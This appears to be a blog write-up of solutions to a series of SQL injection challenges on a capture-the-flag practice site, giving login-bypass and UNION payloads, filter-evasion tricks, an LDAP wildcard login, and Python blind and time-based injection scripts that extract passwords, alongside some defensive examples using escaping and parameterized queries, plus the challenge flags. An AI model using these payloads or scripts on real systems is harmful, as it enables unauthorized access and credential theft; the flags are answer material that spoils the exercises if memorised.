Preface

I recently found an interesting practice site~ It has lots of web challenges, and the SQL injection ones go from shallow to deep, a good fit for beginners.
The site address:

https://ringzer0team.com

Most basic SQLi pattern.(point 1)

Warm-up challenge:

username: admin'#
password: 1

which gives the flag: FLAG-238974289383274893

ACL rulezzz the world.(point 2)

Quick test:

username=admin'

gives

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 4

Close the quote:

username=admin' or 1#

Flag: FLAG-sdfoip340e89rfuj34woit

Login portal 1(point 2)

The following are filtered:

#
--
=

Didn't test anything else; this passes right away:

username=admin' or 'a' like 'a&password=1

and we get the flag: FLAG-4f885o1dal0q1huj6eaxuatcvn

Random Login Form(point 2)

Tried second-order injection first, but it didn't look like that
So went with length truncation: register a username that is admin padded with spaces past the column length, so the stored name is truncated back to admin
Register:

username=admin                                    1
password=1

Log in:

username=admin
password=1

Flag: FLAG-0Kg64o8M9gPQfH45583Mc0jc3u

Just another login form(point 2)

Tried a few things with no luck, so tried a UNION injection:

username = admin' union select md5(1),md5(1),md5(1)#
password = 1

Response: Bad search filter
A quick search shows this is an LDAP-specific error
So log in with

username = *
password = *

Flag: FLAG-38i65201RR4B5g1oAm05fHO0QP
This is a point worth studying, quietly noted~ It's rarely seen in recent SQL injection challenges; I remember it appearing in an XCTF league round before~
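The wildcard login above works because `*` is filter syntax in LDAP, not data. As an added example (not from the challenge or this post), here is a minimal RFC 4515 value escaper plus a small matcher that models how a directory treats an unescaped versus an escaped asterisk; the `(&(uid=...)(userPassword=...))` filter layout is an assumption.

```python
import re

# Characters that must be escaped inside an LDAP filter assertion value (RFC 4515).
_LDAP_SPECIAL = "\\*()\0"


def ldap_escape_filter_value(value: str) -> str:
    """Escape one user-supplied value so it is matched literally, never as filter syntax."""
    return "".join("\\%02x" % ord(c) if c in _LDAP_SPECIAL else c for c in value)


def build_login_filter(username: str, password: str) -> str:
    """Hardened login filter: both inputs are escaped before being spliced in (layout assumed)."""
    return "(&(uid=%s)(userPassword=%s))" % (
        ldap_escape_filter_value(username),
        ldap_escape_filter_value(password),
    )


def _unescape(piece: str) -> str:
    # Turn "\2a"-style escapes back into the literal character they stand for.
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), piece)


def assertion_matches(assertion_value: str, attribute_value: str) -> bool:
    """Model of how a directory evaluates one assertion value: an unescaped '*'
    is a wildcard; everything else, including an escaped '\\2a', matches literally."""
    parts = [re.escape(_unescape(p)) for p in assertion_value.split("*")]
    return re.fullmatch(".*".join(parts), attribute_value, re.DOTALL) is not None
```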

Po po po po postgresql(point 2)

Quick try:

username=admin' or 'a' like 'a&password=1

Response:

ERROR:  invalid input syntax for type boolean: "admin"
LINE 1: SELECT * FROM users WHERE (username = ('admin' or 'a' like '...

So close it up properly:

username=admin') or 'a' like 'a') -- &password=1

Flag: FLAG-mdeq68jNN88xLB1o2m8V33Ld

Don't mess with Noemie; she hates admin!(point 3)

Try:

username = admin' or sleep(5) or 'a' like 'a

The sleep fires
so the quote closing is valid
then go straight at it:

username = admin' or 'a' like 'a

The login fails
so guess the backend statement:

$sql = "select * from users where username='$username' and password = '$password'";

So we try

username = 1' or 1 or '
password = 1

Substituted in, that is

select * from users where username='1' or 1 or '' and password = '1'

which bypasses the login
Flag: FLAG-Yk3Hfovvb5kALU9hI2545MaY

What's the definition of NULL(point 3)

The URL is ?id=MQ==
obviously base64
decoding gives id=1
Quick test:

id = 1'#
id = MScj

gives

SQLite Database error please try again later.

Then I tested for a long time with no result
went back to the start and remembered the challenge description:

Hint WHERE (id IS NOT NULL) AND (ID = ? AND display = 1)

So the backend SQL really is written like this:

WHERE (id IS NOT NULL) AND (ID = base64_decode($_GET[id]) AND display = 1)

Construct

0) OR (ID IS NULL) OR (1=2

Substituted in:

WHERE (id IS NOT NULL) AND (ID = 0) OR (ID IS NULL) OR (1=2 AND display = 1)

Encode it:

?id=MCkgT1IgKElEIElTIE5VTEwpIE9SICgxPTI=

Flag: FLAG-sQFYzqfxbZhAj04NyCCV8tqA
This one is also pretty interesting and worth studying~
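As an added example (not from the original post), the query from the hint rebuilt in an in-memory SQLite database with a constructed table, to show why the decoded payload surfaces the row whose id is NULL (AND binds tighter than OR, so the injected `OR (ID IS NULL)` lands outside the `id IS NOT NULL` guard) and how binding the value as a parameter keeps the guard intact. Table name and rows are constructed.

```python
import base64
import sqlite3


def decode_id_param(encoded: str) -> str:
    """The challenge passes ?id= as base64; decode it the way the backend does."""
    return base64.b64decode(encoded).decode()


def demo_db() -> sqlite3.Connection:
    # Constructed table: one row has a NULL id, which the intended query must never show.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, display INTEGER, content TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?, ?)", [
        (1, 1, "public item"),
        (2, 0, "hidden item"),
        (None, 1, "FLAG-constructed-placeholder"),
    ])
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, decoded_id: str):
    """String-spliced query as the hint describes it (the 'before' form).
    AND binds tighter than OR, so injected OR clauses escape the NULL guard."""
    sql = ("SELECT content FROM items "
           "WHERE (id IS NOT NULL) AND (id = %s AND display = 1)" % decoded_id)
    return [row[0] for row in conn.execute(sql)]


def hardened_lookup(conn: sqlite3.Connection, decoded_id: str):
    """Same query with the value bound as a parameter: the statement's structure is
    fixed, so neither the NULL guard nor the display check can be escaped."""
    sql = "SELECT content FROM items WHERE (id IS NOT NULL) AND (id = ? AND display = 1)"
    return [row[0] for row in conn.execute(sql, (decoded_id,))]
```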

Login portal 2(point 3)

Tried this right away:

username = 1' or 1 or '
password = 1

it's the old trick, after all
Response:

Wrong password for impossibletoguess.

impossibletoguess looks suspicious
probably a username, and it's being echoed back, so try union:

username = 1' union select 1,2#
password = 1

Response:

Wrong password for 1.

The rest is just UNION injection:

1' union select (select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),2#
Wrong password for users.
1' union select (select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='users'),2#
Wrong password for username,password.
1' union select (select username from users limit 0,1),2#
Wrong password for impossibletoguess.
1' union select (select password from users limit 0,1),2#
Wrong password for 1b2f190ad705d7c2afcac45447a31b053fada0c4.

A 40-character password, clearly not MD5; guess SHA1
UNION injection:

username = impossibletoguess' union select sha1(1),sha1(1)#
password = 1

Login succeeds; flag: FLAG-wlez73yxtkae9mpr8aerqay7or

Quote of the day(point 4)

Quick test of the id:

?q=2'
No result found for id "2'"

It echoes back, so try UNION; spaces are filtered, bypass with %0a:

?q=2%0aunion%0aselect%0a1,2#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: 2

Then the old routine:

?q=2%0aunion%0aselect%0a1,(select%0agroup_concat(TABLE_NAME)%0afrom%0ainformation_schema.TABLES%0awhere%0aTABLE_SCHEMA=database())#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: alkdjf4iu,quotes
?q=2%0aunion%0aselect%0a1,(select%0agroup_concat(COLUMN_NAME)%0afrom%0ainformation_schema.COLUMNS%0awhere%0aTABLE_NAME=0x616c6b646a66346975)#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: id,flag
?q=2%0aunion%0aselect%0a1,(select%0aflag%0afrom%0aalkdjf4iu%0alimit%0a0,1)#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: FLAG-bB6294R6cmLUlAu6H71sTd2J

over~

Thinking outside the box is the key(point 4)

Quick try:

?id=2'

gives

SQLite Database error please try again later.

So it's SQLite
Keep testing:

?id=2 and 1=2 union select 1,2 from sqlite_master
2
?id=2 and 1=2 union select 1,sqlite_version() from sqlite_master
3.8.7.1
?id=2 and 1=2 union select 1,((select name from sqlite_master where type='table' limit 0,1)) from sqlite_master
random_stuff

And so on, to get all the table names:

random_stuff
ajklshfajks
troll
aatroll

I pick ajklshfajks
going by earlier experience, it should have a flag column:

?id=2 and 1=2 union select 1,((select flag from ajklshfajks limit 0,1)) from sqlite_master
FLAG-13lIBUTHNFLEprz2KKMx6yqV

over~

No more hacking for me!(point 4)

Nasty one; the page source (F12) explains it:

<!-- l33t dev comment: -->
<!-- No more hacking attempt we implemented the MOST secure filter -->
<!-- urldecode(addslashes(str_replace("'", "", urldecode(htmlspecialchars($_GET['id'], ENT_QUOTES))))) -->

No wonder I couldn't solve it :(
Once you notice this it's easy:

http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,tbl_name,3 FROM sqlite_master WHERE type=%252527table%252527  limit 0,1 -- 
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,sql,3 FROM sqlite_master WHERE type=%252527table%252527  and tbl_name=%252527random_data%252527 limit 0,1 -- 

random_data  CREATE TABLE random_data (id int, message varchar(50), display int) 

http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,message,3 FROM random_data limit 2,1 --

which gives the flag

FLAG-ev72V7Q4a1DzYRw5fxT71GC815JE
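As an added example (not the challenge's code), a Python model of the filter chain from that comment, applied after PHP's own URL decoding of the query string, so you can see which encodings leave a quote in the final value; `html.escape` stands in for htmlspecialchars (it emits `&#x27;` where PHP emits `&#039;`, which does not change the outcome) and `addslashes` is reimplemented. The fix shown is the usual one: bind the id as a parameter, so the trailing urldecode no longer matters.

```python
import html
import sqlite3
from urllib.parse import unquote_plus


def addslashes(s: str) -> str:
    """Python re-implementation of PHP addslashes(): backslash before ' " \\ and NUL."""
    return "".join("\\" + c if c in "'\"\\\0" else c for c in s)


def l33t_filter(param: str) -> str:
    """The 'MOST secure filter' from the page comment, innermost call first.
    `param` is the value as PHP hands it over in $_GET (already URL-decoded once)."""
    s = html.escape(param, quote=True)   # htmlspecialchars($_GET['id'], ENT_QUOTES)
    s = unquote_plus(s)                  # urldecode(...)
    s = s.replace("'", "")               # str_replace("'", "", ...)
    s = addslashes(s)                    # addslashes(...)
    return unquote_plus(s)               # urldecode(...)  <- decodes AFTER sanitising


def quote_survives(wire_value: str) -> bool:
    """Full path from the raw query string: PHP's decode of $_GET, then the filter."""
    return "'" in l33t_filter(unquote_plus(wire_value))


def demo_db() -> sqlite3.Connection:
    # Constructed rows in the schema the challenge revealed.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE random_data (id int, message varchar(50), display int)")
    conn.executemany("INSERT INTO random_data VALUES (?, ?, ?)",
                     [(1, "hello", 1), (2, "not shown", 0)])
    return conn


def lookup_by_id(conn: sqlite3.Connection, raw_id: str):
    """Parameter binding: however it was decoded, the value cannot alter the statement."""
    sql = "SELECT message FROM random_data WHERE id = ? AND display = 1"
    return [r[0] for r in conn.execute(sql, (raw_id,))]
```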

Quote of the day reloaded(point 5)

Is this one a bit of a stretch, or did I miss something?
After trying back and forth, this works:

?q=3\&s=ununionion select 1,2%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: 2

union has to be double-written to get past the filter:

?q=3\&s=ununionion%20select%201,(select%20group_concat(TABLE_NAME)%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=database())%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: qdyk5,quotes
?q=3\&s=ununionion%20select%201,(select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x7164796b35)%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: id,flag
?q=3\&s=ununionion%20select%201,(select flag from qdyk5 limit 0,1)%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: FLAG-enjlleb337u17K7yLqZ927F3

over~
(Note: I solved it, but still feel lost; it doesn't feel very coherent, I just stumbled onto it = =)

Hot Single Mom(point 6)

Seeing the description

Get laid or get lazy it's up to you 
Find online hot single Mom

you know it isn't a serious challenge, and sure enough the site is down (lol)
But it names the source: GoSecure CTF 2014
A search turned up

https://gist.github.com/h3xstream/3bc4f264cc911e37f0d6

Should be a decent injection challenge
Flag: FLAG-wBGc5g147MuVQuC28L9Tw8H8HF

Login portal 3(point 6)

I used blind injection here, but this is the first blind-injection challenge so far, so I don't know whether I made it harder than needed~
Script:

import requests
import string

url = "https://ringzer0team.com/challenges/5"
cookie = {
    "PHPSESSID": "27vctgun5jjk5ou82oqv9clog2",
    "_ga": "GA1.2.1724649637.1519735081",
    "_gid": "GA1.2.933125333.1519735081"
}
flag = ""
for i in range(1, 1000):          # i: position in the string being recovered
    print("i:", i)
    for j in range(33, 127):      # j: candidate ASCII code for that position
    #for j in "0123456789"+string.ascii_letters+"-_!@#$^&*()={}":
        data = {
            #"username":"1' or (substr((database()),%s,1)='%s') and 'a'='a"%(i,j), login3
            #"username": "1' or (substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),%s,1)='%s') and 'a'='a" % (i, j), users
            #"username": "1' or (substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x7573657273),%s,1)='%s') and 'a'='a" % (i, j),username,password
            "username": "1' or (ascii(substr((select password from users limit 0,1),%s,1))=%s) and 'a'='a" % (i, j),
            "password": "1"  # SQL1nj3ct10nFTW
        }

        r = requests.post(url=url, data=data, cookies=cookie)
        # the oracle: this message comes back only when the injected condition held
        if "Invalid username / password" in r.text:
            flag += chr(j)
            print(flag)
            break
    else:
        # no candidate matched at this position: end of the string
        break

I didn't run the column names (lol); knowing the pattern, I guessed password and got it first try~~
Final password:

SQL1nj3ct10nFTW

Log in to get the flag: FLAG-vgnvokjmi3fgx0s23iv5x8n2w2

When it's lite it's not necessarily easy(point 6)

Quick test:

username = 1' or sleep(5) or 'a'='a
password = 1

Error:

SQLite Database error please try again later. Impossible to fetch username & password from users table

That saves effort; it hands over both the table and column names
so just blind-extract password directly:

import requests
import string

url = "https://ringzer0team.com/challenges/19"
cookie = {
    "PHPSESSID": "27vctgun5jjk5ou82oqv9clog2",
    "_ga": "GA1.2.1724649637.1519735081",
    "_gid": "GA1.2.933125333.1519735081"
}
flag = ""
for i in range(1, 1000):          # i: position in the password
    print("i:", i)
    # j: candidate character; SQLite substr() is compared directly, no ascii()
    for j in "0123456789" + string.ascii_letters + "-_!@#$^&*()={}":
        data = {
            "username": "1' or (substr((select password from users limit 0,1),%s,1)='%s') and 'a'='a" % (i, j),
            "password": "1"  # 4dm1nzP455
        }

        r = requests.post(url=url, data=data, cookies=cookie)
        # the oracle: this message comes back only when the injected condition held
        if "Invalid username / password" in r.text:
            flag += j
            print(flag)
            break
    else:
        # no candidate matched at this position: end of the password
        break

Password:

4dm1nzP455

Log in to get the flag: FLAG-rL4t5LRMwjacD82G9vpAd6Gm

Internet As A Service(point 7)

After lots of testing, the payload:

/?s = 1'<0e0union select 1,2,3#

Then the old routine:

?s=1'<0e0union select 1,2,SCHEMA_NAME from information_schema.SCHEMATA limit 1,1#
iaas
?s=1'<0e0union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA like 0x69616173 limit 0,1#
iaas
rz_flag
?s=1'<0e0union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME like 0x727a5f666c6167 limit 0,1#
flag
?s=1'<0e0union select 1,2,flag from rz_flag limit 0,1#
FLAG-0f6Ie30uNz4Dy7o872e15lXLS2NKO1uj

over~~

Login portal 4(point 7)

Time-based blind injection for this one
Script:

import requests

url = "https://ringzer0team.com/challenges/6"
cookie = {
    "PHPSESSID": "vtqgjp8amva1fsr6eolee70af4",
    "_ga": "GA1.2.1724649637.1519735081",
    "_gid": "GA1.2.933125333.1519735081",
    "_gat": "1"
}
flag = ""
for i in range(1, 1000):          # i: position in the password
    for j in range(33, 127):      # j: candidate ASCII code
        print("i:", i, "j:", j)
        data = {
            "username": "1' || if((ascii(substr((select password from users limit 0,1),%s,1))=%s),sleep(3),1) || '" % (i, j),
            "password": "1"
        }
        try:
            # sleep(3) fires only on a match, so a 2.5 s timeout is the oracle
            r = requests.post(url=url, data=data, cookies=cookie, timeout=2.5)
        except requests.exceptions.Timeout:
            flag += chr(j)
            print(flag)
            break
    else:
        # no candidate timed out at this position: end of the password
        break

Password:

UrASQLi1337!

Log in to get the flag

FLAG-70ygerntbicjdzrxmm0rmk0xx2

Afterword

I'm just throwing out a starting point~ Given my limited ability I can only give solutions for most of the challenges; some interesting ones are left for everyone to keep digging into~ Looking forward to the masters' tricks~ Orz

Source link

Hacking more

...